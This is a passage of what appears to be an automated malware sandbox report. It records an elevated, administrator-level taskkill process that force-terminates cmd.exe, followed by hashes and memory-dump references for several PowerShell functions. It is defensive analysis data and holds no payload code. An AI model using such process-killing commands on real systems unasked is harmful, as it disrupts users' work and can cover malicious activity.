                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:49
                                                                                Start time:05:40:44
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM CMD.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Executed Functions

                                                                                  Function 00007FFD9B8C0AE9 Relevance: .2, Instructions: 233COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.1770059088.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8c0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 900f0aaa8190166ecf9bc64d744b1123c0922bcebf7b75209ea915579a5f87c9
                                                                                  • Instruction ID: 34f718b38f9d0da04dc144c90c237ef1c1171b93bc7d2f096d3a3a38c1c9cfc3
                                                                                  • Opcode Fuzzy Hash: 900f0aaa8190166ecf9bc64d744b1123c0922bcebf7b75209ea915579a5f87c9
                                                                                  • Instruction Fuzzy Hash: 26612AB2B2FA8E0FF779A7A858711B876C2DF49694F4901BFD059C71E3ED09A9018241
                                                                                  Function 00007FFD9B8C0BC9 Relevance: .1, Instructions: 83COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.1770059088.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8c0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7dce25ea7aabd7630a08fec1b6e6f3ae0d6d5006df9efc27a5addde2fc811661
                                                                                  • Instruction ID: 2bc202ea4c85f77925373699ce64bbf48692376f2dd61841e0f6ee6d39b01a80
                                                                                  • Opcode Fuzzy Hash: 7dce25ea7aabd7630a08fec1b6e6f3ae0d6d5006df9efc27a5addde2fc811661
                                                                                  • Instruction Fuzzy Hash: 37212972F2FA8E0FE774B76814711B876C2DF48694B5A00BBD05DC71E3DD19AD018245
                                                                                  Function 00007FFD9B7F33B5 Relevance: .0, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.1769732662.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b7f0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                                  • Instruction ID: f015c6d8f1291ae9f9a84129c24d6f916cfece872e45c549876b83854877da12
                                                                                  • Opcode Fuzzy Hash: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                                  • Instruction Fuzzy Hash: D001A73020CB0C4FD748EF0CE051AA5B7E0FF85360F10056DE58AC36A1DA32E882CB45